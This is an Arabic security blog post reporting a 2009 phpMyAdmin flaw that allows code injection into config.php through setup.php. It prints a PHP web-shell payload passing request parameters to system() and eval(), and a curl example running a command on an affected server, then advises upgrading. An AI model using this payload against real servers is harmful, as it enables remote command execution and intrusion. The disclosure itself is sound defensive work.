انتشر مؤخراً كود يستغل ثغرة في سكريبت ادارة قواعد البيانات phpMyAdmin تتيح للمهاجم حقن كود في ملف config.php يساعد المهاجم في تنفيذ أوامر على النظام عن بعد. اكتشفت الثغرة ووضع تحديث لها في مارس 2009 نشرة PMASA-2009-3 وهي موجودة في الاصدارات ما قبل  2.11.9.5 وما قبل 3.1.3.1 من سكريبت phpMyAdmin.

phpMyAdmin

 
يستغل المهاجم خطأ برمجي في ملف scripts/setup.php يمكنّه من حقن كود برمجي في ملف config.php ثم يستخدم الملف السابق لتنفيذ أوامر مباشرة على السيرفر.

مثال للكود المحقون:

$cfg[‘Servers’][$i][‘host’]=”; if($_GET[‘c’]){echo ‘(pre)’;system($_GET[‘c’]);echo ‘(/pre)’;}if($_GET[‘p’]){echo ‘(pre)’;eval($_GET[‘p’]);echo ‘(/pre)’;};//’] = ‘localhost’;

 

مثال لاستغلال الثغرة:

$ curl “http://dominio-afectado/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/”
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd […]

إذا كنت تستخدم سكريبت phpMyAdmin لادارة قواعد بيانات موقعك ننصحك بالترقية لآخر اصدار متوفر في أقرب وقت.

 

للاطلاع على الاستغلال ولمزيد من المعلومات: GNUCITIZENMilw0rm-8921

عن الكاتب:


باحث عن المعرفة, طالب ماجستير باحث في أمن المعلومات و مدوّن يهتم في العديد من الجالات المتعلّقة بالشبكات, الحماية والأنظمة المفتوحة المصدر.

Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedIn